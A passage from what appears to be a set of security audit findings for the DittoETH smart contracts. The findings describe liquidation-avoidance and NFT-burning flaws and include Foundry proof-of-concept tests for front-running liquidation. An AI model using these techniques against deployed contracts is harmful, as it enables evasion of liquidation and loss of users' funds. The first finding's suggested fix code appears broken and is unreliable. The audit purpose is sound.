frames.\\n```\\nfunction _canLiquidate(MTypes.MarginCallPrimary memory m)\\n private\\n view\\n returns (bool)\\n {\\n // Initial code\\n\\n uint256 timeDiff = LibOrders.getOffsetTimeHours() - m.short.updatedAt;\\n uint256 resetLiquidationTime = LibAsset.resetLiquidationTime(m.asset);\\n\\n if (timeDiff >= resetLiquidationTime) {\\n return false;\\n } else {\\n uint256 secondLiquidationTime = LibAsset.secondLiquidationTime(m.asset);\\n bool isBetweenFirstAndSecondLiquidationTime = timeDiff\\n > LibAsset.firstLiquidationTime(m.asset) && timeDiff <= secondLiquidationTime\\n && s.flagMapping[m.short.flaggerId] == msg.sender;\\n bool isBetweenSecondAndResetLiquidationTime =\\n timeDiff > secondLiquidationTime && timeDiff <= resetLiquidationTime;\\n if (\\n !(\\n (isBetweenFirstAndSecondLiquidationTime)\\n || (isBetweenSecondAndResetLiquidationTime)\\n )\\n ) {\\n revert Errors.MarginCallIneligibleWindow();\\n }\\n\\n return true;\\n }\\n }\\n}\\n```\\n\\nShort Record Merging:\\nFor the last short record, the `fillShortRecord` function combines new matched shorts with the existing one, invoking the `merge` function, which updates the `updatedAt` value to the current time.\\n```\\nfunction fillShortRecord(\\n address asset,\\n address shorter,\\n uint8 shortId,\\n SR status,\\n uint88 collateral,\\n uint88 ercAmount,\\n uint256 ercDebtRate,\\n uint256 zethYieldRate\\n ) internal {\\n AppStorage storage s = appStorage();\\n\\n uint256 ercDebtSocialized = ercAmount.mul(ercDebtRate);\\n uint256 yield = collateral.mul(zethYieldRate);\\n\\n STypes.ShortRecord storage short = s.shortRecords[asset][shorter][shortId];\\n if (short.status == SR.Cancelled) {\\n short.ercDebt = short.collateral = 0;\\n }\\n\\n short.status = status;\\n LibShortRecord.merge(\\n short,\\n ercAmount,\\n ercDebtSocialized,\\n collateral,\\n yield,\\n LibOrders.getOffsetTimeHours()\\n );\\n }\\n```\\n\\nIn the merge function we see that we update the updatedAt value to creationTime which is 
LibOrders.getOffsetTimeHours().\\n```\\nfunction merge(\\n STypes.ShortRecord storage short,\\n uint88 ercDebt,\\n uint256 ercDebtSocialized,\\n uint88 collateral,\\n uint256 yield,\\n uint24 creationTime\\n ) internal {\\n // Resolve ercDebt\\n ercDebtSocialized += short.ercDebt.mul(short.ercDebtRate);\\n short.ercDebt += ercDebt;\\n short.ercDebtRate = ercDebtSocialized.divU64(short.ercDebt);\\n // Resolve zethCollateral\\n yield += short.collateral.mul(short.zethYieldRate);\\n short.collateral += collateral;\\n short.zethYieldRate = yield.divU80(short.collateral);\\n // Assign updatedAt\\n short.updatedAt = creationTime;\\n }\\n```\\n\\nThis means that even if the position was flagged and is still under the `primaryLiquidationCR`, it cannot be liquidated as the `updatedAt` timestamp has been updated, making the time difference not big enough.\\nчImpose stricter conditions for updating the last short record when the position is flagged and remains under the `primaryLiquidationCR` post-merge, similar to how the `combineShorts` function works.\\n```\\nfunction createShortRecord(\\n address asset,\\n address shorter,\\n SR status,\\n uint88 collateral,\\n uint88 ercAmount,\\n uint64 ercDebtRate,\\n uint80 zethYieldRate,\\n uint40 tokenId\\n ) internal returns (uint8 id) {\\n AppStorage storage s = appStorage();\\n\\n // Initial code\\n\\n } else {\\n // All shortRecordIds used, combine into max shortRecordId\\n id = Constants.SHORT_MAX_ID;\\n fillShortRecord(\\n asset,\\n shorter,\\n id,\\n status,\\n collateral,\\n ercAmount,\\n ercDebtRate,\\n zethYieldRate\\n );\\n\\n // If the short was flagged, ensure resulting c-ratio > primaryLiquidationCR\\n if (Constants.SHORT_MAX_ID.shortFlagExists) {\\n if (\\n Constants.SHORT_MAX_ID.getCollateralRatioSpotPrice(\\n LibOracle.getSavedOrSpotOraclePrice(_asset)\\n ) < LibAsset.primaryLiquidationCR(_asset)\\n ) revert Errors.InsufficientCollateral();\\n // Resulting combined short has sufficient c-ratio to remove flag\\n 
Constants.SHORT_MAX_ID.resetFlag();\\n }\\n }\\n }\\n```\\nчThis allows a user with a position under the primaryLiquidationCR to avoid primary liquidation even if the short is in the valid time ranges for liquidation.ч```\\nfunction flagShort(address asset, address shorter, uint8 id, uint16 flaggerHint)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, shorter, id)\\n {\\n // initial code\\n\\n short.setFlagger(cusd, flaggerHint);\\n emit Events.FlagShort(asset, shorter, id, msg.sender, adjustedTimestamp);\\n }\\n```\\n -Incorrect require in setterчlowчThere are 3 setters in `OwnerFacet.sol` which require statement doesn't match with the error message.\\n`_setInitialMargin`, `_setPrimaryLiquidationCR` and `_setSecondaryLiquidationCR` will revert for the value 100, which will revert with an incorrect error message, which is `\"below 1.0\"`. When 100 is 1.0, not below.\\n*Instances (3)`\\n```\\n function _setInitialMargin(address asset, uint16 value) private {\\n require(value > 100, \"below 1.0\"); // @audit a value of 100 is 1x, so this should be > 101\\n s.asset[asset].initialMargin = value;\\n require(LibAsset.initialMargin(asset) < Constants.CRATIO_MAX, \"above max CR\");\\n }\\n\\n function _setPrimaryLiquidationCR(address asset, uint16 value) private {\\n require(value > 100, \"below 1.0\"); // @audit a value of 100 is 1x, so this should be > 101\\n require(value <= 500, \"above 5.0\");\\n require(value < s.asset[asset].initialMargin, \"above initial margin\");\\n s.asset[asset].primaryLiquidationCR = value;\\n }\\n\\n function _setSecondaryLiquidationCR(address asset, uint16 value) private {\\n require(value > 100, \"below 1.0\"); // @audit a value of 100 is 1x, so this should be > 101\\n require(value <= 500, \"above 5.0\");\\n require(value < s.asset[asset].primaryLiquidationCR, \"above primary liquidation\");\\n s.asset[asset].secondaryLiquidationCR = value;\\n }\\n```\\n\\nAs it is contrastable, in the below functions, this 
check is done correctly:\\n```\\n function _setForcedBidPriceBuffer(address asset, uint8 value) private {\\n require(value >= 100, \"below 1.0\");\\n require(value <= 200, \"above 2.0\");\\n s.asset[asset].forcedBidPriceBuffer = value;\\n }\\n\\n function _setMinimumCR(address asset, uint8 value) private {\\n require(value >= 100, \"below 1.0\");\\n require(value <= 200, \"above 2.0\");\\n s.asset[asset].minimumCR = value;\\n require(\\n LibAsset.minimumCR(asset) < LibAsset.secondaryLiquidationCR(asset),\\n \"above secondary liquidation\"\\n );\\n }\\n```\\nчThe value against which the `>` operator checks should be 101, not 100.чThe incorrect value for the require statement could lead to a restriction of precision for these parameters; it wouldn't be possible to input a net value of 100.ч```\\n function _setInitialMargin(address asset, uint16 value) private {\\n require(value > 100, \"below 1.0\"); // @audit a value of 100 is 1x, so this should be > 101\\n s.asset[asset].initialMargin = value;\\n require(LibAsset.initialMargin(asset) < Constants.CRATIO_MAX, \"above max CR\");\\n }\\n\\n function _setPrimaryLiquidationCR(address asset, uint16 value) private {\\n require(value > 100, \"below 1.0\"); // @audit a value of 100 is 1x, so this should be > 101\\n require(value <= 500, \"above 5.0\");\\n require(value < s.asset[asset].initialMargin, \"above initial margin\");\\n s.asset[asset].primaryLiquidationCR = value;\\n }\\n\\n function _setSecondaryLiquidationCR(address asset, uint16 value) private {\\n require(value > 100, \"below 1.0\"); // @audit a value of 100 is 1x, so this should be > 101\\n require(value <= 500, \"above 5.0\");\\n require(value < s.asset[asset].primaryLiquidationCR, \"above primary liquidation\");\\n s.asset[asset].secondaryLiquidationCR = value;\\n }\\n```\\n -Unhandled chainlink revert in case its multisigs block access to price feedsчlowчIn some extreme cases, oracles can be taken offline or token prices can fall to zero. 
Therefore, a call to `latestRoundData` could potentially revert and none of the circuit breakers would fall back to querying any prices automatically.\\nAccording to Ditto's documentation in https://dittoeth.com/technical/oracles, there are two circuit breaking events if Chainlink data becomes unusable: Invalid Fetch Data and Price Deviation.\\nThe issue arises from the possibility that Chainlink multisignature entities might intentionally block access to the price feed. In such a scenario, the invocation of the `latestRoundData` function could potentially trigger a revert, rendering the circuit-breaking events ineffective in mitigating the consequences, as they would be incapable of querying any price data or specific information.\\nIn certain exceptional circumstances, Chainlink has already taken the initiative to temporarily suspend specific oracles. As an illustrative instance, during the UST collapse incident, Chainlink opted to halt the UST/ETH price oracle to prevent the dissemination of erroneous data to various protocols.\\nAdditionally, these dangerous oracle scenarios are very well documented by OpenZeppelin in https://blog.openzeppelin.com/secure-smart-contract-guidelines-the-dangers-of-price-oracles. For our context:\\n\"While currently there's no whitelisting mechanism to allow or disallow contracts from reading prices, powerful multisigs can tighten these access controls. In other words, the multisigs can immediately block access to price feeds at will. Therefore, to prevent denial of service scenarios, it is recommended to query ChainLink price feeds using a defensive approach with Solidity's try/catch structure. 
In this way, if the call to the price feed fails, the caller contract is still in control and can handle any errors safely and explicitly\".\\nAlthough a fallback mechanism, specifically the TWAP, is in place to uphold system functionality in the event of Chainlink failure, it is imperative to note that Ditto's documentation explicitly underscores its substantial reliance on oracles. Consequently, it is imperative to address this issue comprehensively within the codebase, given that it pertains to one of the fundamental functionalities of the environment.\\nAs mentioned above, In order to mitigate the potential risks associated with a denial-of-service scenario, it is advisable to employ a `try-catch` mechanism when querying Chainlink prices in the function `getOraclePrice` under LibOracle.sol. Through this approach, in the event of a failure in the invocation of the price feed, the caller contract retains command and can adeptly manage any errors in a secure and explicit manner.\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/main/contracts/libraries/LibOracle.sol#L25-L32\\n```\\n (\\n uint80 baseRoundID,\\n int256 basePrice,\\n /*uint256 baseStartedAt*/\\n ,\\n uint256 baseTimeStamp,\\n /*uint80 baseAnsweredInRound*/\\n ) = baseOracle.latestRoundData();\\n```\\n\\nHere I enumerate some of the core functions that will be affected in case of an unhandled oracle revert:\\nFunction createMarket under OwnerFacet.sol:\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/main/contracts/facets/OwnerFacet.sol#L47-L68\\nFunction updateOracleAndStartingShort under LibOrders.sol:\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/main/contracts/libraries/LibOrders.sol#L812-L816\\nFunction getShortIdAtOracle under ViewFaucet.sol:\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/main/contracts/facets/ViewFacet.sol#L173-L187чEncase the invocation of the function `latestRoundData()` within a `try-catch` construct instead of invoking it directly. 
In circumstances where the function call results in a revert, the catch block may serve the purpose of invoking an alternative oracle or managing the error in a manner that is deemed appropriate for the system.чIf a configured Oracle feed has malfunctioned or ceased operating, it will produce a revert when checking for `latestRoundData` that would need to be manually handled by the system.ч```\\n (\\n uint80 baseRoundID,\\n int256 basePrice,\\n /*uint256 baseStartedAt*/\\n ,\\n uint256 baseTimeStamp,\\n /*uint80 baseAnsweredInRound*/\\n ) = baseOracle.latestRoundData();\\n```\\n -Owner of a bad ShortRecord can front-run flagShort calls AND liquidateSecondary and prevent liquidationчhighчA shorter can keep an unhealthy short position open by minting an NFT of it and front-running attempts to liquidate it with a transfer of this NFT (which transfers the short position to the new owner)\\nA Short Record (SR) is a struct representing a short position that has been opened by a user. It holds different information, such as how much collateral is backing the short, and how much debt it owes (this ratio is called Collateral Ratio or CR). At any time, any user can flag someone else's SR as \"dangerous\", if its debt grows too much compared to its collateral. This operation is accessible through `MarginCallPrimaryFacet::flagShort`, which checks through the `onlyValidShortRecord` modifier that the SR isn't `Cancelled`. If the SR is valid, then its debt/collateral ratio is verified, and if it's below a specific threshold, flagged. But that also means that if a SR is considered invalid, it cannot be flagged. And it seems there is a way for the owner of a SR to cancel its SR while still holding the position.\\nThe owner of a SR can mint an NFT to represent it and make it transferable. 
This is done in 5 steps:\\n`TransferFrom` verify usual stuff regarding the NFT (ownership, allowance, valid receiver...)\\n`LibShortRecord::transferShortRecord` is called\\n`transferShortRecord` verify that SR is not `flagged` nor `Cancelled`\\nSR is deleted (setting its status to Cancelled)\\na new SR is created with same parameters, but owned by the receiver.\\nNow, let's see what would happen if Alice has a SR_1 with a bad CR, and Bob tries to flag it.\\nBob calls flagShorton SR_1, the tx is sent to the mempool\\nAlice is watching the mempool, and don't want her SR to be flagged:\\nShe front-run Bob's tx with a transfer of her SR_1 to another of the addresses she controls\\nNow Bob's tx will be executed after Alice's tx:\\nThe SR_1 is \"deleted\" and its status set to `Cancelled`\\nBob's tx is executed, and `flagShort` reverts because of the `onlyValidShortRecord`\\nAlice can do this trick again to keep here undercol SR until it can become dangerous\\nBut this is not over:\\nEven when her CR drops dangerously (CR<1.5), `liquidateSecondary` is also DoS'd as it has the same check for `SR.Cancelled`\\nAdd these tests to `ERC721Facet.t.sol` :\\nFront-running flag\\n```\\n function test_audit_frontrunFlagShort() public {\\n address alice = makeAddr(\"Alice\"); //Alice will front-run Bob's attempt to flag her short\\n address aliceSecondAddr = makeAddr(\"AliceSecondAddr\");\\n address bob = makeAddr(\"Bob\"); //Bob will try to flag Alice's short \\n address randomUser = makeAddr(\"randomUser\"); //regular user who created a bid order\\n \\n //A random user create a bid, Alice create a short, which will match with the user's bid\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, randomUser);\\n fundLimitShortOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, alice);\\n //Alice then mint the NFT associated to the SR so that it can be transfered\\n vm.prank(alice);\\n diamond.mintNFT(asset, Constants.SHORT_STARTING_ID);\\n\\n //ETH price drops from 4000 to 2666, making Alice's short 
flaggable because its < LibAsset.primaryLiquidationCR(asset)\\n setETH(2666 ether);\\n \\n // Alice saw Bob attempt to flag her short, so she front-run him and transfer the SR\\n vm.prank(alice);\\n diamond.transferFrom(alice, aliceSecondAddr, 1);\\n \\n //Bob's attempt revert because the transfer of the short by Alice change the short status to SR.Cancelled\\n vm.prank(bob);\\n vm.expectRevert(Errors.InvalidShortId.selector);\\n diamond.flagShort(asset, alice, Constants.SHORT_STARTING_ID, Constants.HEAD);\\n } \\n```\\n\\nFront-running liquidateSecondary\\n```\\n function test_audit_frontrunPreventFlagAndSecondaryLiquidation() public {\\n address alice = makeAddr(\"Alice\"); //Alice will front-run Bob's attempt to flag her short\\n address aliceSecondAddr = makeAddr(\"AliceSecondAddr\");\\n address aliceThirdAddr = makeAddr(\"AliceThirdAddr\");\\n address bob = makeAddr(\"Bob\"); //Bob will try to flag Alice's short \\n address randomUser = makeAddr(\"randomUser\"); //regular user who created a bid order\\n \\n //A random user create a bid, Alice create a short, which will match with the user's bid\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, randomUser);\\n fundLimitShortOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, alice);\\n //Alice then mint the NFT associated to the SR so that it can be transfered\\n vm.prank(alice);\\n diamond.mintNFT(asset, Constants.SHORT_STARTING_ID);\\n\\n //set cRatio below 1.1\\n setETH(700 ether);\\n \\n //Alice is still blocking all attempts to flag her short by transfering it to her secondary address by front-running Bob\\n vm.prank(alice);\\n diamond.transferFrom(alice, aliceSecondAddr, 1);\\n vm.prank(bob);\\n vm.expectRevert(Errors.InvalidShortId.selector);\\n diamond.flagShort(asset, alice, Constants.SHORT_STARTING_ID, Constants.HEAD);\\n\\n //Alice front-run (again// rest of code) Bob and transfers the NFT to a third address she owns\\n vm.prank(aliceSecondAddr);\\n diamond.transferFrom(aliceSecondAddr, aliceThirdAddr, 1);\\n\\n 
//Bob's try again on the new address, but its attempt revert because the transfer of the short by Alice change the short status to SR.Cancelled\\n STypes.ShortRecord memory shortRecord = getShortRecord(aliceSecondAddr, Constants.SHORT_STARTING_ID);\\n depositUsd(bob, shortRecord.ercDebt);\\n vm.expectRevert(Errors.MarginCallSecondaryNoValidShorts.selector);\\n liquidateErcEscrowed(aliceSecondAddr, Constants.SHORT_STARTING_ID, DEFAULT_AMOUNT, bob);\\n }\\n```\\nчOwner of a bad ShortRecord can front-run flagShort calls AND liquidateSecondary and prevent liquidationчBecause of this, a shorter could maintain the dangerous position (or multiple dangerous positions), while putting the protocol at risk.ч```\\n function test_audit_frontrunFlagShort() public {\\n address alice = makeAddr(\"Alice\"); //Alice will front-run Bob's attempt to flag her short\\n address aliceSecondAddr = makeAddr(\"AliceSecondAddr\");\\n address bob = makeAddr(\"Bob\"); //Bob will try to flag Alice's short \\n address randomUser = makeAddr(\"randomUser\"); //regular user who created a bid order\\n \\n //A random user create a bid, Alice create a short, which will match with the user's bid\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, randomUser);\\n fundLimitShortOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, alice);\\n //Alice then mint the NFT associated to the SR so that it can be transfered\\n vm.prank(alice);\\n diamond.mintNFT(asset, Constants.SHORT_STARTING_ID);\\n\\n //ETH price drops from 4000 to 2666, making Alice's short flaggable because its < LibAsset.primaryLiquidationCR(asset)\\n setETH(2666 ether);\\n \\n // Alice saw Bob attempt to flag her short, so she front-run him and transfer the SR\\n vm.prank(alice);\\n diamond.transferFrom(alice, aliceSecondAddr, 1);\\n \\n //Bob's attempt revert because the transfer of the short by Alice change the short status to SR.Cancelled\\n vm.prank(bob);\\n vm.expectRevert(Errors.InvalidShortId.selector);\\n diamond.flagShort(asset, alice, 
Constants.SHORT_STARTING_ID, Constants.HEAD);\\n } \\n```\\n -Previous NFT owner can burn NFT from the new ownerчhighчShort records can be transferred as NFTs. Internally, the short record is deleted from the sender and re-created for the new owner (receiver). However, the `tokenId` of the deleted short record is not reset, allowing the previous NFT owner to burn the NFT from the new owner.\\nShort positions, i.e., short records, can be represented as an NFT (ERC-721) with a specific `tokenId`, storing the reference to the short record id in the `shortRecordId` property of the `nftMapping` mapping.\\nSuch a short record can be transferred to another address by sending the NFT to the new owner. Internally, when transferring the ERC-721 token, the `transferShortRecord` function is called (e.g., in line 162 of the `ERC721Facet.transferFrom` function).\\nThe `transferShortRecord` function first validates if the short record is transferable (e.g., not flagged and not canceled) and then calls the `deleteShortRecord` function in line 132 to delete the short record from the `shortRecords` mapping. 
Thereafter, a new short record with the values of the transferred short record is created with the new owner as the shorter, and the `nftMapping` struct is updated accordingly.\\ncontracts/libraries/LibShortRecord.sol#L132\\n```\\nfunction transferShortRecord(\\n address asset,\\n address from,\\n address to,\\n uint40 tokenId,\\n STypes.NFT memory nft\\n) internal {\\n AppStorage storage s = appStorage();\\n STypes.ShortRecord storage short = s.shortRecords[asset][from][nft.shortRecordId];\\n if (short.status == SR.Cancelled) revert Errors.OriginalShortRecordCancelled();\\n if (short.flaggerId != 0) revert Errors.CannotTransferFlaggedShort();\\n❌ deleteShortRecord(asset, from, nft.shortRecordId);\\n uint8 id = createShortRecord(\\n asset,\\n to,\\n SR.FullyFilled,\\n short.collateral,\\n short.ercDebt,\\n short.ercDebtRate,\\n short.zethYieldRate,\\n tokenId\\n );\\n if (id == Constants.SHORT_MAX_ID) {\\n revert Errors.ReceiverExceededShortRecordLimit();\\n }\\n s.nftMapping[tokenId].owner = to;\\n s.nftMapping[tokenId].shortRecordId = id;\\n}\\n```\\n\\nHowever, the `LibShortRecord.deleteShortRecord` function neglects to reset and delete the short record's `tokenId`, which is initially set to the `tokenId` of the newly minted NFT in line of the `ERC721Facet.mintNFT` function. Consequently, upon transferring the short record, the deleted short record still references the transferred NFT's `tokenId`, in addition to the new short record which also references the same `tokenId`. Thus, two short records (with different owners), one being even deleted, reference the same NFT token.\\nThis oversight leads to the following issues (with number 3 being the most severe):\\nThe `ERC721Facet.balanceOf` function will report an incorrect NFT token balance for the previous NFT owner: If the short record was only partially filled before transferring it as a NFT, the remaining short record can still be fully filled, resetting the `SR.Cancelled` status. 
This will cause the `balanceOf` function to include this short record, and due to the short record still referencing the transferred NFT's `tokenId`, this NFT is still counted as owned by the previous owner.\\nThe previous NFT owner can not tokenize the remaining short record: As the `tokenId` of the deleted short record is not reset, the previous owner can not tokenize the remaining short record as any attempt to mint a new NFT via the `ERC721Facet.mintNFT` function will revert with the `Errors.AlreadyMinted` error.\\nThe previous NFT owner can burn the NFT from the new owner: As the `tokenId` of the deleted and partially filled short record is not reset, the short can be fully filled, resetting the `SR.Cancelled` status. By subsequently combining this short with another short using the `ShortRecordFacet.combineShorts` function, the combined shorts will have their associated NFT burned.\\nPlease note that the owner of the transferred short record can re-mint a NFT for the short via the `ERC721Facet.mintNFT`, but if the owner is a contract, the contract may lack the required functionality to do so.\\nThe following test case demonstrates the outline issue 3 above:\\nчConsider resetting the `tokenId` of the deleted short record in the `LibShortRecord.deleteShortRecord` function.чThe previous NFT owner can burn the NFT from the new owner.\\nIf this NFT transfer was part of a trade and, for instance, sent to an escrow contract, the previous NFT owner can burn the NFT from the escrow contract, while the escrow contract lacks the functionality to re-mint the NFT for the short record. 
This renders the short record unusable, and funds (collateral) associated with the short record are lost.ч```\\nfunction transferShortRecord(\\n address asset,\\n address from,\\n address to,\\n uint40 tokenId,\\n STypes.NFT memory nft\\n) internal {\\n AppStorage storage s = appStorage();\\n STypes.ShortRecord storage short = s.shortRecords[asset][from][nft.shortRecordId];\\n if (short.status == SR.Cancelled) revert Errors.OriginalShortRecordCancelled();\\n if (short.flaggerId != 0) revert Errors.CannotTransferFlaggedShort();\\n❌ deleteShortRecord(asset, from, nft.shortRecordId);\\n uint8 id = createShortRecord(\\n asset,\\n to,\\n SR.FullyFilled,\\n short.collateral,\\n short.ercDebt,\\n short.ercDebtRate,\\n short.zethYieldRate,\\n tokenId\\n );\\n if (id == Constants.SHORT_MAX_ID) {\\n revert Errors.ReceiverExceededShortRecordLimit();\\n }\\n s.nftMapping[tokenId].owner = to;\\n s.nftMapping[tokenId].shortRecordId = id;\\n}\\n```\\n -Instant arbitrage opportunity through rETH and stETH price discrepancyчlowчUser can choose to withdraw their zETH to be a rETH or stETH, while in reality most user will choose the best return (highest value between rETH and stETH), instant arbitrage will happen and this will trigger pool imbalance, draining one over the other.\\nIn DittoETH, they accept two special types of Ethereum tokens: rETH and stETH. These tokens are based on regular ETH but are designed to stay close in value to one regular Ether. However, in reality, they can have slightly different values. rETH, stETH.\\nIn practice, when user want to withdraw, they can choose between rETH and stETH based on which one is worth more at that moment. The system doesn't really care which one you put in when a user first deposited their asset.\\nNow, here's where it gets interesting. Because rETH and stETH can have slightly different values, a savvy user could deposit the cheaper one, get a zeth, and then withdraw the more valuable rETH and stETH. 
a quick way to make some extra profit\\nAs we can see on line 110-112, the rETH or stETH withdrawn is depends on `ethAmount`, which from `_ethConversion` it's amount is 'equal' between rETH and stETH\\n```\\nFile: BridgeRouterFacet.sol\\n function withdraw(address bridge, uint88 zethAmount)\\n external\\n nonReentrant\\n onlyValidBridge(bridge)\\n {\\n if (zethAmount == 0) revert Errors.ParameterIsZero();\\n uint88 fee;\\n uint256 withdrawalFee = bridge.withdrawalFee();\\n uint256 vault;\\n if (bridge == rethBridge || bridge == stethBridge) {\\n vault = Vault.CARBON;\\n } else {\\n vault = s.bridge[bridge].vault;\\n }\\n if (withdrawalFee > 0) {\\n fee = zethAmount.mulU88(withdrawalFee);\\n zethAmount -= fee;\\n s.vaultUser[vault][address(this)].ethEscrowed += fee;\\n }\\n uint88 ethAmount = _ethConversion(vault, zethAmount);\\n vault.removeZeth(zethAmount, fee);\\n IBridge(bridge).withdraw(msg.sender, ethAmount);\\n emit Events.Withdraw(bridge, msg.sender, zethAmount, fee);\\n }\\n// rest of code\\n function _ethConversion(uint256 vault, uint88 amount) private view returns (uint88) {\\n uint256 zethTotalNew = vault.getZethTotal();\\n uint88 zethTotal = s.vault[vault].zethTotal;\\n if (zethTotalNew >= zethTotal) {\\n // when yield is positive 1 zeth = 1 eth\\n return amount;\\n } else {\\n // negative yield means 1 zeth < 1 eth\\n return amount.mulU88(zethTotalNew).divU88(zethTotal);\\n }\\n }\\n```\\nчConsider to use oracle to adjust the price difference between rETH and stETHчInstant arbitrage opportunity through rETH and stETH price discrepancy, will also trigger imbalance between rETH and stETH pool.ч```\\nFile: BridgeRouterFacet.sol\\n function withdraw(address bridge, uint88 zethAmount)\\n external\\n nonReentrant\\n onlyValidBridge(bridge)\\n {\\n if (zethAmount == 0) revert Errors.ParameterIsZero();\\n uint88 fee;\\n uint256 withdrawalFee = bridge.withdrawalFee();\\n uint256 vault;\\n if (bridge == rethBridge || bridge == stethBridge) {\\n vault = 
Vault.CARBON;\\n } else {\\n vault = s.bridge[bridge].vault;\\n }\\n if (withdrawalFee > 0) {\\n fee = zethAmount.mulU88(withdrawalFee);\\n zethAmount -= fee;\\n s.vaultUser[vault][address(this)].ethEscrowed += fee;\\n }\\n uint88 ethAmount = _ethConversion(vault, zethAmount);\\n vault.removeZeth(zethAmount, fee);\\n IBridge(bridge).withdraw(msg.sender, ethAmount);\\n emit Events.Withdraw(bridge, msg.sender, zethAmount, fee);\\n }\\n// rest of code\\n function _ethConversion(uint256 vault, uint88 amount) private view returns (uint88) {\\n uint256 zethTotalNew = vault.getZethTotal();\\n uint88 zethTotal = s.vault[vault].zethTotal;\\n if (zethTotalNew >= zethTotal) {\\n // when yield is positive 1 zeth = 1 eth\\n return amount;\\n } else {\\n // negative yield means 1 zeth < 1 eth\\n return amount.mulU88(zethTotalNew).divU88(zethTotal);\\n }\\n }\\n```\\n -Division before multiplication results in lower `dittoMatchedShares` distributed to usersчmediumчShares amount is rounded down to number of days staked. Max truncation is 1 day, min time is 14 days. At most 1 / 14 * 100% = 7.1% of accrued shares will be truncated.\\nDivision before multiplication\\n```\\n uint88 shares = eth * (timeTillMatch / 1 days);\\n```\\n\\nSuppose `timeTillMatch = 14.99 days`, `eth = 1e18`. Expected result is `14.99 * 1e18 / 1 = 14.99e18 shares`. Actual result is `1e18 * (14.99 / 1) = 14e18 shares`ч```\\n- uint88 shares = eth * (timeTillMatch / 1 days);\\n+ uint88 shares = uint88(uint256(eth * timeTillMatch) / 1 days);\\n```\\nчUp to 7.1% of user's shares will be truncatedч```\\n uint88 shares = eth * (timeTillMatch / 1 days);\\n```\\n -Using a cached price in the critical shutdownMarket()чmediumчThe `MarketShutdownFacet::shutdownMarket()` is a critical function allowing anyone to freeze the market permanently. 
The function determines whether or not the market will be frozen based on the asset collateral ratio calculated from a cached price, which can be outdated (too risky for this critical function).\\nOnce the market is frozen, no one can unfreeze it.\\nThe `shutdownMarket()` allows anyone to call to freeze the market permanently when the asset collateral ratio threshold (default of 1.1 ether) has been reached. Once the market is frozen, all shorters will lose access to their positions. Even the protocol's DAO or admin cannot unfreeze the market. Therefore, the `shutdownMarket()` becomes one of the most critical functions.\\nTo calculate the asset collateral ratio (cRatio), the `shutdownMarket()` executes the `_getAssetCollateralRatio()`. However, the `_getAssetCollateralRatio()` calculates the `cRatio` using the cached price loaded from the `LibOracle::getPrice()`.\\nUsing the cached price in a critical function like `shutdownMarket()` is too risky, as the cached price can be outdated. The function should consider only a fresh price queried from Chainlink.\\n```\\n function shutdownMarket(address asset)\\n external\\n onlyValidAsset(asset)\\n isNotFrozen(asset)\\n nonReentrant\\n {\\n uint256 cRatio = _getAssetCollateralRatio(asset);\\n if (cRatio > LibAsset.minimumCR(asset)) {\\n revert Errors.SufficientCollateral();\\n } else {\\n STypes.Asset storage Asset = s.asset[asset];\\n uint256 vault = Asset.vault;\\n uint88 assetZethCollateral = Asset.zethCollateral;\\n s.vault[vault].zethCollateral -= assetZethCollateral;\\n Asset.frozen = F.Permanent;\\n if (cRatio > 1 ether) {\\n // More than enough collateral to redeem ERC 1:1, send extras to TAPP\\n uint88 excessZeth =\\n assetZethCollateral - assetZethCollateral.divU88(cRatio);\\n s.vaultUser[vault][address(this)].ethEscrowed += excessZeth;\\n // Reduces c-ratio to 1\\n Asset.zethCollateral -= excessZeth;\\n }\\n }\\n emit Events.ShutdownMarket(asset);\\n }\\n\\n // rest of code\\n\\n function 
_getAssetCollateralRatio(address asset)\\n private\\n view\\n returns (uint256 cRatio)\\n {\\n STypes.Asset storage Asset = s.asset[asset];\\n return Asset.zethCollateral.div(LibOracle.getPrice(asset).mul(Asset.ercDebt));\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/facets/MarketShutdownFacet.sol#L36\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/facets/MarketShutdownFacet.sol#L37\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/facets/MarketShutdownFacet.sol#L44\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/facets/MarketShutdownFacet.sol#L99чUsing a cached price in the critical shutdownMarket()\\nThe `shutdownMarket()` requires the most accurate price, not just a cached price. Execute the `LibOracle::getOraclePrice()` to get the accurate price from Chainlink.чUsing the cached price in a critical function like `shutdownMarket()` is too risky, as the cached price can be outdated.\\nOnce the market is frozen, all shorters will lose access to their positions. 
Even the protocol's DAO or admin cannot unfreeze the market.ч```\\n function shutdownMarket(address asset)\\n external\\n onlyValidAsset(asset)\\n isNotFrozen(asset)\\n nonReentrant\\n {\\n uint256 cRatio = _getAssetCollateralRatio(asset);\\n if (cRatio > LibAsset.minimumCR(asset)) {\\n revert Errors.SufficientCollateral();\\n } else {\\n STypes.Asset storage Asset = s.asset[asset];\\n uint256 vault = Asset.vault;\\n uint88 assetZethCollateral = Asset.zethCollateral;\\n s.vault[vault].zethCollateral -= assetZethCollateral;\\n Asset.frozen = F.Permanent;\\n if (cRatio > 1 ether) {\\n // More than enough collateral to redeem ERC 1:1, send extras to TAPP\\n uint88 excessZeth =\\n assetZethCollateral - assetZethCollateral.divU88(cRatio);\\n s.vaultUser[vault][address(this)].ethEscrowed += excessZeth;\\n // Reduces c-ratio to 1\\n Asset.zethCollateral -= excessZeth;\\n }\\n }\\n emit Events.ShutdownMarket(asset);\\n }\\n\\n // rest of code\\n\\n function _getAssetCollateralRatio(address asset)\\n private\\n view\\n returns (uint256 cRatio)\\n {\\n STypes.Asset storage Asset = s.asset[asset];\\n return 